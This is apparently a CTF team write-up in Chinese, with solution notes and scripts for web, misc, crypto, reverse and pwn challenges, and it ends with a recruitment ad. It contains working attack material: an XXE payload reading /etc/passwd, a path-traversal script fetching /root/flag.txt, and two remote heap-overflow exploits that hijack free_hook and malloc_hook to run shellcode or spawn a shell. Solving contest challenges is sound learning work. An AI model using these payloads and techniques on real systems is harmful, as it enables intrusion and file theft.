恭喜Venom在本次比赛中获得第四名的好成绩!(团队收人,能熬的那种~)
Game
解题思路
post /score.php
score=15
就会有 flag
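// Submit score=15 to score.php and show the raw response body in #output.
// The score value is chosen by the client; the server accepts it as-is.
$.ajax({
    url: 'score.php',
    type: 'POST',
    data: 'score=' + 15,
    success: function (data) {
        // `data` already is the response body; the former `var data = data;`
        // only re-declared the parameter and did nothing.
        // .text() inserts the body as text, so any markup in it is not rendered.
        $("#output").text(data);
    }
});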
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE GVI [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<feedback>
<author>&xxe;</author>
</feedback>
/proc/self/fd/2
用 file:// 读不到,改用 php filter 读
flag在 index.php注释部分
show_me_your_image
import string
import requests as req
import base64
import urllib
·
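# Substitution table of the challenge's custom base64 alphabet: 64 entries,
# one per character of the key side.  b64table maps key-chars -> value-chars
# (test() applies it before b64decode), b64table2 is the inverse (get() applies
# it after b64encode).  Note the value side uses '\\' where '/' would be expected.
z = {'0': 'Y', '2': 'P', '4': 'y', '6': 'e', '8': 'v', 'B': 'z', 'D': 'N', 'F': 't', 'H': 'x', 'J': 'U', 'L': 'X', 'N': 'F', 'P': 'V', 'R': 'q', 'T': 'a', 'V': 'l', 'X': 'm', 'Z': 'S', 'b': '4', 'd': 'B', 'f': 'h', 'h': '5', 'j': 'c', 'l': 'M', 'n': '9', 'p': 'w', 'r': '1', 't': '8', 'v': 'o', 'x': 'i', 'z': 'K',
     '+': 'u', '/': 'A', '1': '0', '3': 'C', '5': 'T', '7': 'I', '9': 'k', 'A': 'b', 'C': 'J', 'G': '7', 'I': 'f', 'K': '6', 'M': 'Z', 'O': '2', 'Q': '+', 'S': 'd', 'U': '3', 'W': 'R', 'Y': 'W', 'a': 'L', 'c': 'r', 'e': 'g', 'g': 'n', 'i': 'E', 'k': 'j', 'm': 'G', 'o': 'H', 'q': 'Q', 's': 'p', 'u': 's', 'w': 'O', 'y': 'D', 'E': '\\'}
# Python 2 offers string.maketrans(), Python 3 str.maketrans(); both take two
# equal-length strings, so pick whichever this interpreter provides.
_maketrans = getattr(str, 'maketrans', None) or string.maketrans
_key_side = ''.join(z.keys())
_value_side = ''.join(z.values())   # same iteration order as z.keys()
b64table = _maketrans(_key_side, _value_side)
b64table2 = _maketrans(_value_side, _key_side)
URL = 'http://3fc6a707471d4c83959773ac33db4ec348f07f0fa23e4e15.changame.ichunqiu.com/img.php?name={}'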
def get(pl):
    """Request img.php?name=<pl> and print the response body.

    *pl* is base64-encoded, re-mapped through b64table2 into the service's
    alphabet and URL-quoted; both intermediate encodings are printed as well.
    """
    encoded = base64.b64encode(pl)
    print "[+] Normal Base64 :", encoded
    custom = encoded.translate(b64table2)
    print "[+] Encode Base64 :", custom
    res = req.get(URL.format(urllib.quote(custom)))
    print(res.content)
def test(pl):
    """Map *pl* through b64table (service alphabet -> base64) and print the decoded bytes."""
    standard = pl.translate(b64table)
    decoded = base64.b64decode(standard)
    print decoded
if __name__ == '__main__':
    # Fetch the app's upload template first, then the flag file.
    for target in ("../../../../../../proc/self/cwd/templates/upload.html",
                   "../../../../../../root/flag.txt"):
        get(target)
签到题
解题思路
dig txt gamectf.com
gamectf.com. 600 IN TXT "flag{welcome_TXT}"
CodeValues
# Carve the archive appended to the PNG: copy byte by byte from offset 22838 to the end.
dd bs=1 skip=22838 if=24w.png of=1.zip
# Unpack it; the extracted image is what gets converted and scanned afterwards.
7z x 1.zip
解压出图片后转黑白,扫描二维码即得flag
flag{24_word_m4n7ra}
修复文件头GIF8
po叔说有的帧有问题
一帧一帧save后查看,在7/66帧找到flag:
解题思路
下载之后爆破zip密码,爆破出来为loli
解压之后把图片拖到16进制编辑器,在尾部发现Ook编码,解码就行了
flag{f71d6bca-3210-4a31-9feb-1768a65a33db}
SM4
解题思路
from pysm4 import encrypt, decrypt
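# SM4 key (16 bytes) and ciphertext (48 bytes) recovered from the challenge.
key = [13, 204, 99, 177, 254, 41, 198, 163, 201, 226, 56, 214, 192, 194, 98, 104]
c = [46, 48, 220, 156, 184, 218, 57, 13, 246, 91, 1, 63, 60, 67, 105, 64, 149, 240, 217, 77, 107, 49, 222, 61, 155, 225, 231, 196, 167, 121, 9, 16, 60, 182, 65, 101, 39, 253, 250, 224, 9, 204, 154, 122, 206, 43, 97, 59]
# Re-pack both as hex strings (Python 2 str.encode('hex')).
key = ''.join(map(chr, key)).encode('hex')
c = ''.join(map(chr, c)).encode('hex')
print(key, c)
k = int(key, 16)
flag = ''
# Three 16-byte blocks (32 hex chars each), each decrypted independently with
# the same key, then concatenated.
for i in range(3):
    block = int(c[i * 32:i * 32 + 32], 16)
    # '%032x' always yields exactly 16 bytes.  The former hex(...)[2:-1] relied on
    # a trailing 'L' being present (dropping the last nibble when it was not) and
    # failed on odd-length output whenever the block had leading zero nibbles.
    flag += ('%032x' % decrypt(block, k)).decode('hex')
print(flag)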
dp
解题思路
from sympy import *
from sympy.core.numbers import igcdex
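e = 65537
n = 9637571466652899741848142654451413405801976834328667418509217149503238513830870985353918314633160277580591819016181785300521866901536670666234046521697590230079161867282389124998093526637796571100147052430445089605759722456767679930869250538932528092292071024877213105462554819256136145385237821098127348787416199401770954567019811050508888349297579329222552491826770225583983899834347983888473219771888063393354348613119521862989609112706536794212028369088219375364362615622092005578099889045473175051574207130932430162265994221914833343534531743589037146933738549770365029230545884239551015472122598634133661853901
dp = 81339405704902517676022188908547543689627829453799865550091494842725439570571310071337729038516525539158092247771184675844795891671744082925462138427070614848951224652874430072917346702280925974595608822751382808802457160317381440319175601623719969138918927272712366710634393379149593082774688540571485214097
c = 5971372776574706905158546698157178098706187597204981662036310534369575915776950962893790809274833462545672702278129839887482283641996814437707885716134279091994238891294614019371247451378504745748882207694219990495603397913371579808848136183106703158532870472345648247817132700604598385677497138485776569096958910782582696229046024695529762572289705021673895852985396416704278321332667281973074372362761992335826576550161390158761314769544548809326036026461123102509831887999493584436939086255411387879202594399181211724444617225689922628790388129032022982596393215038044861544602046137258904612792518629229736324827
# dp = d mod (p-1), so e*dp = 1 (mod p-1) and 2^(e*dp) = 2 (mod p):
# gcd(n, 2^(e*dp) - 2) is therefore p.
p = gcd(n, pow(2, e * dp, n) - 2)
q = n // p
phi = (p - 1) * (q - 1)
# igcdex(e, phi) returns (x, y, g) with e*x + phi*y = g, and x may be negative.
# d has to satisfy e*d = 1 (mod phi), so reduce modulo phi -- the former '% n'
# only gave the right d when x happened to be non-negative.
d = long(igcdex(e, phi)[0] % phi)
m = pow(c, d, n)
# Pad to an even number of hex digits so .decode('hex') always gets whole bytes
# (hex(m)[2:-1] also depended on the Python 2 'L' suffix being present).
m_hex = '%x' % m
if len(m_hex) % 2:
    m_hex = '0' + m_hex
print(m_hex.decode('hex'))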
flag{c3009b61-f9ed-4b20-8855-edab53e89530}
解题思路
edit过程中根据strlen更新长度,存在堆溢出
而后程序有rwx段,更改free_hook到&shellcode即可
from pwn import *
context.update(log_level="debug")  # pwntools debug logging: shows the traffic with the service
def add(l, note):
    """Queue menu command 1 (add) with length *l* and body *note* onto the batched input s.

    Nothing is sent here; the whole batch goes out in one sendline() later.
    """
    global s
    s += "\n".join(("1", str(l), note))
def delete(index):
    """Queue menu command 2 (delete) for *index* onto the batched input s."""
    global s
    s += "2\n%s\n" % (index,)
def edit(index, note):
    """Queue menu command 3 (edit) on *index* with the new body *note* onto the batched input s."""
    global s
    s += "\n".join(("3", str(index), note))
#p=process("./pwn")
# Connect to the challenge service and answer its token prompt.
p=remote("df0a72047d6c.gamectf.com",10001)
p.sendlineafter("Please input you token:\n","icq95702d8b2edd7591a517869c3f12f")
# add()/delete()/edit() only append their menu commands to `s`; the whole
# batch is sent once, base64-encoded on a single line, at the end.
s=""
add(0x34,"a"*0x34)
add(0x34,"a"*0x34)
add(0x34,"a\n")
edit(0,"b"*0x34)
edit(0,"c"*0x34+"\x71")
delete(1)
add(0x34,"a"*0x34)
add(0x34,"a"*0x34)
add(0x38,"a"*0x38)
delete(2)
# NOTE(review): 0x80EBA0c, 0x080EB4F0 and 0x80eba58 are hard-coded absolute
# addresses, presumably from the (non-PIE) challenge binary -- they only hold
# for that exact build; verify against the binary before reuse.
edit(3,p32(0x80EBA0c)+"\n")
add(0x34,"a"*0x34)
add(0x34,p32(0xf0)+"\n")
edit(5,p32(0xa0)+p32(0x080EB4F0)*15+p32(0x080EB4F0)+asm(shellcraft.cat("/flag"))+"\n")
edit(0,p32(0x80eba58)+"\n")
delete(5)
#gdb.attach(p)
# Python 2's "base64" codec wraps its output with newlines; strip them so the
# batch fits in one sendline().
p.sendline(s.encode("base64").replace("\n",""))
p.interactive()
多个字符串strcat时长度判断存在逻辑错误
可以绕过0x400的检测造成strcat时堆溢出
而后利用堆溢出构造堆重叠,leak libc并修改malloc hook即可
改至one_target即可get shell:
from pwn import *
context.update(log_level="debug")  # pwntools debug logging: shows the traffic with the service
def add(size, note):
    """Drive menu option 1: request a note of *size* bytes, then send *note* raw (no newline appended)."""
    for prompt, answer in ((">>> ", "1"), (" : ", str(size))):
        p.sendlineafter(prompt, answer)
    p.sendafter(": ", note)
def show(index):
    """Drive menu option 2 for *index* and return the text printed after ': ', stripped of whitespace."""
    p.sendlineafter(">>> ", "2")
    p.sendlineafter(" : ", str(index))
    p.recvuntil(": ")
    line = p.recvuntil("\n")
    return line.strip()
def delete(index):
    """Drive menu option 3: free the note at *index*."""
    for prompt, answer in ((">>> ", "3"), (" : ", str(index))):
        p.sendlineafter(prompt, answer)
def strcat(index1, index2):
    """Drive menu option 4 (strcat) with the two note indices, sent in the order given."""
    p.sendlineafter(">>> ", "4")
    for idx in (index1, index2):
        p.sendlineafter(" : ", str(idx))
def fake(a):
    """Drive menu option 5 with the elements of *a* sent as one space-separated line."""
    p.sendlineafter(">>> ", "5")
    p.sendlineafter(" : ", " ".join(str(item) for item in a))
#p=process("./pwn")
# Connect to the challenge service.  The "#N" trailing comments give the note
# index each add() ends up with.
p=remote("a32f094e35d7.gamectf.com",20001)
add(0x18,"kirin\n")#0
add(0x400,"a"*0x3ff+"\n")#1
add(0x28,"b"*9+p64(0xb1)+"\n")#2
delete(0)
add(0x400,"kirin\n")#0
add(0x18,"kirin\n")#3
add(0x80,"kirin\n")
delete(0)
fake([1,2])
delete(3)
add(0x18,"aaaa\n")
# show(4) is padded with two NUL bytes to the 8 bytes u64() expects
# (assumes the service leaks 6 bytes -- confirm against its output).
libc_addr=u64(show(4)+"\x00\x00")
print hex(libc_addr)
add(0x68,"bbbb\n")
add(0x68,"bbbb\n")
delete(4)
delete(6)
delete(5)
# NOTE(review): 0x7ffff7dd1b58, 0x7ffff7dd1af0, 0x7ffff7a10000 and 0xf2519 are
# absolute values presumably copied from a local debugger session; they are
# only valid for the exact libc build the author tested against.
hook=libc_addr-0x00007ffff7dd1b58+ 0x7ffff7dd1af0
add(0x68,p64(hook-0x23)+"\n")
add(0x68,p64(hook-0x23)+"\n")
add(0x68,"aaaa\n")
add(0x68,"\x00"*0x13+p64(libc_addr+0x7ffff7a10000-0x00007ffff7dd1b58+0xf2519)+"\n")
#gdb.attach(p)
p.interactive()
解题思路
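def func2(s):
    """Return the number of 1 bits in *s* (popcount), halving at most 10000 times.

    The loop stops early once *s* reaches 0; for a negative *s* the halving never
    reaches 0, so the 10000-iteration cap is what terminates it.
    """
    k = 0
    for _ in range(10000):
        if s == 0:
            break
        k += s % 2
        s = s // 2  # floor division keeps the halving integral on Python 3 as well
    return k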
def func3(s):
    """Return the parity of *s*: 1 when odd, 0 when even."""
    parity = s % 2
    return parity
# Sanity check: popcount(1) is odd, so this prints 1.
print(func3(func2(1)))
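def func1(n, l, r):
    """Binary-search the largest integer m in [l, r] with m*m <= n.

    Called as func1(n, 1, n) this is the integer square root of n.
    Assumes l*l <= n so that the lower bound is always feasible.
    """
    if l == r:
        return l
    mid = (l + r + 1) // 2  # upper midpoint, so [mid, r] always shrinks
    if n < mid * mid:
        return func1(n, l, mid - 1)
    return func1(n, mid, r)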
def _func1(s):
    """Integer square root of *s*: func1 over the full search range [1, s]."""
    lo, hi = 1, s
    return func1(s, lo, hi)
# Sanity check: isqrt(10) is 3.
print(_func1(10))
def NEXTM(n, m):
    """Advance the trial divisor: m + 1 while m*m <= n, otherwise 0 (TEST's stop marker)."""
    return m + 1 if m * m <= n else 0
def NEXTN(n, m):
    """Return 0 when m divides n (TEST's "composite" marker), else n unchanged."""
    return 0 if n % m == 0 else n
def TEST(n, m):
    """Trial division driven by NEXTN/NEXTM.

    Returns 0 as soon as NEXTN zeroes n (a divisor m was found) and 1 once NEXTM
    zeroes m (no divisor with m*m <= n).  Same check order as the recursive form:
    n == 0 is tested before m == 0 on every step.
    """
    while n != 0:
        if m == 0:
            return 1
        n, m = NEXTN(n, m), NEXTM(n, m)
    return 0
def func4(n):
    """Run TEST starting at trial divisor 2; with the NEXTN/NEXTM above this is 1 iff n (>= 2) is prime."""
    first_divisor = 2
    return TEST(n, first_divisor)
# For each target isqrt value, print the smallest i whose integer square root is j
# and whose popcount is odd.
z = [963, 4396, 6666, 1999, 3141]
for j in z:
    i = next((x for x in range(1, 100000000)
              if _func1(x) == j and func3(func2(x)) == 1), None)
    if i is not None:
        print i
# 1 plus the number of primes in [3, 10000].
kkk = 0 + 1
kkk += sum(func4(i) for i in range(3, 10001))
print kkk
flag{927369-19324816-44435556-3996001-9865881-1229}
直接拿python 实现一遍 然后爆破
flat
解题思路
# Transformed flag body (36 bytes) as read out of the binary.
key1 = [0x4A, 0x32, 0x32, 0x36, 0x31,
        0x43, 0x36, 0x33, 0x2D, 0x33,
        0x49, 0x32, 0x49, 0x2D, 0x45,
        0x47, 0x45, 0x34, 0x2D, 0x49,
        0x42, 0x43, 0x43, 0x2D, 0x49,
        0x45, 0x34, 0x31, 0x41, 0x35,
        0x49, 0x35, 0x46, 0x34, 0x48,
        0x42]
len11 = 42
head = "flag{"
weiba = "}"
num = "0123456789"
chrss = "abcdefghijklmnopqrstuvwxyz"
xiahu = [13, 18, 23, 28]
# Inverse lookup of the per-character transform: '-' is kept as-is, a lowercase
# letter f is compared as ord(f) - 0x30 and a digit f as ord(f) + 17.  Digit
# entries are added last so they win where both rules match the same byte --
# the same precedence the original had with its digit loop running after the
# letter loop.
table = {0x2d: 0x2d}
table.update((ord(f) - 0x30, ord(f)) for f in chrss)
table.update((ord(f) + 17, ord(f)) for f in num)
s = bytearray(b':' * 36)  # ':' is left at positions no rule matches
for i, k in enumerate(key1):
    if k in table:
        s[i] = table[k]
print(s)
#flag{9bbfa2fc-c8b8-464d-8122-84da0e8e5d71}
check1、2、3、4 表明字符串长度、头、尾、下划线的位置
check5 判断长度,对每个字符处理,然后对照表
因为格式是uuid 所以就变成了一个解了
招新小广告
ChaMd5 ctf组 长期招新
尤其是crypto+reverse+pwn+合约的大佬
欢迎联系admin@chamd5.org